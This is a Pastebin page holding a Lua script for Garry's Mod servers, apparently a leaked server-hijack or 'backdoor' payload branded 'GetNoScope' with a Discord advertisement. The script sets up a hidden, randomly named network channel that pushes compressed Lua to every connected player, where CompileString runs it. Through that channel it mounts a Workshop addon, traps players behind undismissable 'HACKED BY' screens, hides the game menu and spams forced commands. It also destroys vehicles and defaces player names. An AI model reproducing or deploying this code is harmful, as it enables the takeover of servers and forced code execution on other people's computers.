Advertisement
kinder20

Untitled

May 8th, 2019
107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.86 KB | None | 0 0
  1. --[[
  2. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  3. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  4. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  5. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  6. ]]--
  7.  
  8.  
  9. print([=[
  10. ██████╗ ███████╗████████╗
  11. ██╔════╝ ██╔════╝╚══██╔══╝
  12. ██║ ███╗█████╗ ██║
  13. ██║ ██║██╔══╝ ██║
  14. ╚██████╔╝███████╗ ██║
  15. ╚═════╝ ╚══════╝ ╚═╝
  16. ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  17. ████╗ ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  18. ██╔██╗ ██║██║ ██║███████╗██║ ██║ ██║██████╔╝█████╗
  19. ██║╚██╗██║██║ ██║╚════██║██║ ██║ ██║██╔═══╝ ██╔══╝
  20. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║ ███████╗
  21. ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝
  22. BY IXXE --> GetNoScope V2.1.Self-Leak
  23. Buy GVAC https://discord.gg/hvtEqjk !
  24. ¯\_(ツ)_/¯
  25. ]=])
  26.  
  27. for k, v in pairs( player.GetAll() ) do
  28. if ( v:Alive() ) then
  29. v:GodEnable()
  30. else
  31. v:Spawn()
  32. timer.Simple( 1.2, function()
  33. v:GodEnable()
  34. end)
  35. end
  36. end
  37.  
  38.  
  39. local function rdm_str(len)
  40. if !len or len <= 0 then return '' end
  41. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  42. end
  43.  
  44. local net_string = rdm_str(25)
  45.  
  46. util.AddNetworkString(net_string)
  47. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  48. hook.Add("PlayerInitialSpawn", "☂️_PRIVATE_JOKE",function(ply)
  49. if !ply:IsBot() then
  50. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  51. end
  52. end)
  53.  
  54. local function SendToClient(code)
  55. local data = util.Compress(code)
  56. local len = #data
  57. net.Start(net_string)
  58. net.WriteUInt(len, 16)
  59. net.WriteData(data, len)
  60. net.Broadcast()
  61. end
  62. timer.Simple( 17, function()
  63. SendToClient([[
  64. print([=[
  65. ██████╗ ███████╗████████╗
  66. ██╔════╝ ██╔════╝╚══██╔══╝
  67. ██║ ███╗█████╗ ██║
  68. ██║ ██║██╔══╝ ██║
  69. ╚██████╔╝███████╗ ██║
  70. ╚═════╝ ╚══════╝ ╚═╝
  71. ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  72. ████╗ ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  73. ██╔██╗ ██║██║ ██║███████╗██║ ██║ ██║██████╔╝█████╗
  74. ██║╚██╗██║██║ ██║╚════██║██║ ██║ ██║██╔═══╝ ██╔══╝
  75. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║ ███████╗
  76. ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝
  77. BY IXXE --> GetNoScope V2.Self-Leak
  78. Buy GVAC https://discord.gg/hvtEqjk !
  79. ¯\_(ツ)_/¯
  80. ]=])
  81. hook.Add("Think","🤔_WHY_YOU_WANT_EDIT_MY_CODE",function() gui.HideGameUI() end)
  82. local CreateModel = function(mdl, isragdoll)
  83. local ent
  84. if isragdoll then
  85. ent = ClientsideRagdoll(mdl)
  86. else
  87. ent = ClientsideModel(mdl, RENDERGROUP_OTHER)
  88. end
  89.  
  90. return ent
  91. end
  92. local NewHookAdd = function(str, name, func)
  93. --name = "dronesrewrite_hell_hooks" .. name
  94. hook.Add(str, name, func)
  95.  
  96. table.insert(cache, {
  97. str = str,
  98. name = name
  99. })
  100. end
  101. local cache = { }
  102. timercache = { }
  103. local Const = 0
  104. local Noise = nil
  105. local pl = LocalPlayer()
  106. timer.Create("💸_BUY_GVAC_NOW", 2, 1, function()
  107. local dlight = DynamicLight(pl:EntIndex())
  108. if dlight then
  109. dlight.pos = Vector(-2224.216797, -2918.063721, 2354.03125)
  110. dlight.r = 255
  111. dlight.g = 0
  112. dlight.b = 0
  113. dlight.brightness = 16
  114. dlight.Decay = 1000
  115. dlight.Size = 2000
  116. dlight.DieTime = CurTime() + 2
  117. end
  118. local pos = pl:GetPos() + Vector(0, 0, 120)
  119. local ang = Angle(0, pl:GetAngles().y, 0)
  120. local tr = util.TraceLine({
  121. start = pos,
  122. endpos = pos + ang:Forward() * 86,
  123. filter = pl
  124. })
  125. steamworks.FileInfo(1618885873,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)
  126.  
  127. timer.Simple(15, function()
  128.  
  129. game.AddParticles( "particles/enigma.pcf" )
  130.  
  131. PrecacheParticleSystem("enigma")
  132.  
  133. for i = 1, 10 do
  134. ParticleEffectAttach("enigma", PATTACH_ABSORIGIN_FOLLOW, LocalPlayer(), 0)
  135. end
  136. end)
  137. local rag_pos = tr.HitPos + tr.HitNormal * 3 - Vector(0, 0, 80)
  138. for i = 1, 16 do
  139. sound.Play("vo/npc/Barney/ba_laugh04.wav", Vector( 0, 0, 0 ) )
  140. end
  141. local mdl = CreateModel("models/food/hotdog.mdl")
  142. mdl:SetModelScale(5)
  143. mdl:SetAngles(ang + Angle(15, 180, 0))
  144. mdl:SetPos(rag_pos)
  145. mdl:Spawn()
  146. hook.Add("CalcView", "😕_EDIT_MY_CODE_IS_STUPID", function(ply, _pos, _ang, fov)
  147. local view = { }
  148. view.origin = pos + VectorRand()
  149. view.angles = ang
  150. view.fov = fov + math.random(-80, -50)
  151.  
  152. return view
  153. end)
  154.  
  155. timer.Create("👻_WHY_ME_PLEASE_LEAK_GIZEH", 1.4, 1, function()
  156. mdl:Remove()
  157. hook.Remove("CalcView", "😕_EDIT_MY_CODE_IS_STUPID")
  158. end)
  159. end)
  160. ]])
  161. end)
  162.  
  163. timer.Simple( 20, function()
  164. timer.Create( "ouupsss", 0.1, 0, function()
  165. for k,v in pairs(player.GetAll()) do
  166. v:SendLua('RunConsoleCommand("impulse","100")')
  167. end
  168. end)
  169. hook.Add( 'SetupMove', '😈_NO_SCOPED', function( ply, move )
  170. if not ply:IsOnGround() then
  171. move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  172. end
  173. end )
  174. for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
  175.  
  176. local explo = ents.Create("env_explosion")
  177. explo:SetPos(v:GetPos())
  178. explo:SetKeyValue("iMagnitude", "300")
  179. explo:Spawn()
  180. explo:Activate()
  181. explo:Fire("Explode", "", 0)
  182. end
  183.  
  184. end
  185. for k,v in pairs(player.GetAll()) do
  186. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  187. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  188. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  189. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  190. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  191. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  192. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  193. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  194. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  195. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  196. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  197. v:ManipulateBoneScale( a, Vector(100,100,100))
  198. v:ManipulateBoneScale( b, Vector(100,100,100))
  199. v:ManipulateBoneScale( c, Vector(100,100,100))
  200. v:ManipulateBoneScale( d, Vector(100,100,100))
  201. v:ManipulateBoneScale( e, Vector(100,100,100))
  202. v:ManipulateBoneScale( f, Vector(100,100,100))
  203. v:ManipulateBoneScale( g, Vector(100,100,100))
  204. v:ManipulateBoneScale( h, Vector(100,100,100))
  205. v:ManipulateBoneScale( i, Vector(100,100,100))
  206. v:ManipulateBoneScale( j, Vector(100,100,100))
  207. v:ManipulateBoneScale( k, Vector(100,100,100))
  208. end
  209. SendToClient([[
  210. surface.CreateFont( "1XX3_big_text",{
  211. font = "Open Sans",
  212. size = 500,
  213. weight = 1000,
  214. antialias = true
  215. })
  216. surface.CreateFont("3Y_IXX3", {
  217. font = "Open Sans",
  218. size = ScrW()*0.02,
  219. weight = 10,
  220. blursize = 0,
  221. scanlines = 2.5,
  222. antialias = false
  223. })
  224. local function UwU_text( a )
  225.  
  226. local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  227. local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  228. local b = 215
  229.  
  230. return Color( r, g, b, a or 255 )
  231.  
  232. end
  233. local w,h = ScrW(), ScrH()
  234. local W, H = ScrW(), ScrH()
  235. local MySelf = LocalPlayer()
  236.  
  237. if ohno then
  238. ohno:Remove()
  239. ohno = nil
  240. end
  241.  
  242. ohno = vgui.Create( "DFrame" )
  243. ohno:SetSize( w, h )
  244. ohno:SetPos(0,0)
  245. ohno:SetDraggable ( false )
  246. ohno:SetTitle("")
  247. ohno:MakePopup();
  248. ohno:ShowCloseButton(false)
  249. ohno.Paint = function( self )
  250. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  251. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  252. end
  253.  
  254. local pw, ph = w, h*0.6
  255. local px, py = w/2-pw/2, h/2-ph/2
  256.  
  257. local Close = vgui.Create( "DButton", ohno )
  258. Close:SetPos(px, py)
  259. Close:SetText( "" )
  260. Close:SetSize( pw, ph )
  261. Close.Paint = function( self, tw, th )
  262.  
  263. local shift = math.sin(RealTime()*3)*1.5 + 5
  264.  
  265. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  266. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  267. draw.DrawText( "(╯°□°)╯︵ ┻━┻ BY Δ", "3Y_IXX3", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  268. draw.DrawText( "(╯°□°)╯︵ ┻━┻ BY IXXE", "3Y_IXX3", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  269. draw.DrawText( "KindΣr", "3Y_IXX3", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  270. draw.DrawText( "KindΣr", "3Y_IXX3", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  271. draw.DrawText( "HackingSΣΣP BY JACK", "3Y_IXX3", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  272. draw.DrawText( "Kappa", "3Y_IXX3", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  273. draw.DrawText( "Δ", "3Y_IXX3", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  274. draw.DrawText( "Δ", "3Y_IXX3", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  275. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  276. draw.DrawText( "Kinder", "3Y_IXX3", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  277. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  278. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  279. draw.DrawText( "MALADE", "3Y_IXX3", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  280. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  281. draw.DrawText( "JACK", "3Y_IXX3", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  282. draw.DrawText( "RIP ;) BY IXXE", "3Y_IXX3", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  283. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  284. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  285. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  286. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  287. draw.DrawText( "GetNoScope BY Kinder", "3Y_IXX3", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  288. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  289. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  290. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  291. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  292. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  293. end
  294. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  295. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  296. timer.Create("🥵_MENU_LUA_IS_DEAD_BUY_GVAC", 0.1, 0, function()
  297. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  298. end)
  299. timer.Simple( 15, function()
  300. wut = vgui.Create( "DFrame" )
  301. wut:SetSize( w, h )
  302. wut:SetPos(0,0)
  303. wut:SetDraggable ( false )
  304. wut:SetTitle("")
  305. wut:ShowCloseButton(false)
  306. wut.Paint = function( self )
  307. surface.SetDrawColor(30, 30, 30, 0)
  308. end
  309. local Close = vgui.Create( "DButton", wut )
  310. Close:SetPos(px, py)
  311. Close:SetText( "" )
  312. Close:SetSize( pw, ph )
  313. Close.Paint = function( self, tw, th )
  314.  
  315. local shift = math.sin(RealTime()*3)*1.5 + 5
  316.  
  317. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  318. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  319. draw.SimpleText( "HACKED BY", "1XX3_big_text", tw/2 , th/4, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  320. draw.SimpleText( "HACKED BY", "1XX3_big_text", tw/2 - shift , th/4 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  321. end
  322. RunConsoleCommand("r_shader_srgb","1")
  323. RunConsoleCommand("gmod_language","fr")
  324. ohno:Remove()
  325. ohno = nil
  326. local name = GetConVar("sv_skyname"):GetString()
  327. if name == "painted" then
  328. local sky
  329. for _, v in ipairs(ents.GetAll()) do
  330. if v:GetClass() == "env_skypaint" then
  331. sky = v
  332. break
  333. end
  334. end
  335. if !IsValid(sky) then return end
  336. hook.Add("PostRender","☁️_RAINBOW",function()
  337. local col = HSVToColor(CurTime()*30 % 360,1,1)
  338. col = Vector(col.r/255,col.g/255,col.b/255)
  339. sky:SetTopColor(col)
  340. sky:SetBottomColor(col)
  341. end)
  342. else
  343. local prefix = {"lf","ft","rt","bk","dn","up"}
  344. local mats = {}
  345. for i=1,6 do
  346. mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  347. end
  348. hook.Add("PostRender","☁️_RAINBOW",function()
  349. local col = HSVToColor(CurTime()*30 % 360,1,1)
  350. for i=1,6 do
  351. mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  352. end
  353. end)
  354. end
  355. local chienchaud = ClientsideModel("models/food/burger.mdl")
  356. chienchaud:SetNoDraw(true)
  357. chienchaud:SetModelScale(120)
  358. timer.Create("☄️_LOOK_THE_SKY", 0.01, 0, function()
  359. chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  360. end)
  361.  
  362. local data = {}
  363. local function genchienchaud(id)
  364. local pos = LocalPlayer():GetPos()
  365. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  366. end
  367. for i=1, 150 do
  368. genchienchaud(i)
  369. end
  370. hook.Add("PostDrawOpaqueRenderables","🌭_CHIEN_CHAUD",function()
  371. local z = LocalPlayer():GetPos().z
  372. for i=1, #data do
  373. chienchaud:SetPos(data[i][1])
  374. chienchaud:SetupBones()
  375. chienchaud:DrawModel()
  376. data[i][1].z = data[i][1].z - data[i][2] / 20
  377. if data[i][1].z <= z then
  378. genchienchaud(i)
  379. end
  380. end
  381. end)
  382. end )
  383. sound.PlayURL( "https://www.dropbox.com/s/cjaotmjoaavsp5s/Matbow%20-%20Trap%20King.mp3?dl=1", "mono noblock noplay", function( station )
  384. timer.Simple( 0.1, function()
  385. ClientStation = station
  386. station:EnableLooping( true )
  387. station:Play()
  388. station:SetVolume( 2 )
  389. end )
  390. end )
  391. timer.Create("🔒", 0.11, 0, function()
  392. RunConsoleCommand("+attack")
  393. end)
  394. timer.Create("🔓", 0.12, 0, function()
  395. RunConsoleCommand("-attack")
  396. end)
  397. ]])
  398. end)
  399.  
  400. local you = "💸_BUY_GVAC"
  401.  
  402. timer.Simple( 20, function()
  403.  
  404. membresenigma =
  405. {
  406. "RedBoxing",
  407. "Δ",
  408. "Kinder",
  409. "Kappa",
  410. "Kinder",
  411. "Redboxing",
  412. "Δ",
  413. "Δ",
  414. "GET Hacked",
  415. "GET Δ !!!!",
  416. "GET NO SCOPE !!!!",
  417. "GET NO SCOPE !!!!",
  418. "GET HACKED!!!!",
  419. "GET NO SCOPE !!!!",
  420. "GET NO SCOPE !!!!",
  421. "GET NO SCOPE !!!!",
  422. " ΔΔΔ",
  423. "BY Kinder",
  424. "BY IXXE",
  425. "BY Kinder",
  426. "BY IXXE"
  427. }
  428.  
  429. timer.Create( "🦠_NE_DEL_RIEN_SINON_CANCER", 0.2, 0, function()
  430. for k, ply in pairs( player.GetAll() ) do
  431. DarkRP.notify(ply, 2, 2, "[Oh Dommage!] "..table.Random(membresenigma).."")
  432. end
  433. end)
  434.  
  435.  
  436. for k,v in pairs(player.GetAll()) do
  437. v:SetRunSpeed(400* 4);
  438. v:SetWalkSpeed(400 * 4);
  439. end
  440.  
  441.  
  442. timer.Create( "🤫_RIP_U_VAC_BANNED", 1, 0, function()
  443. for k,v in pairs(player.GetAll()) do
  444. v:GodEnable()
  445. v:setDarkRPVar( "rpname", "La HackingSΣΣP Vous Viol " )
  446. end
  447.  
  448. end )
  449.  
  450. end)
  451.  
  452.  
  453. timer.Create( "🤤_SPAM", 0, 0, function()
  454. SendToClient([[print("GET HACKED !! BY IXXE")]])
  455. print("GET HACKED !! BY IXXE")
  456. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement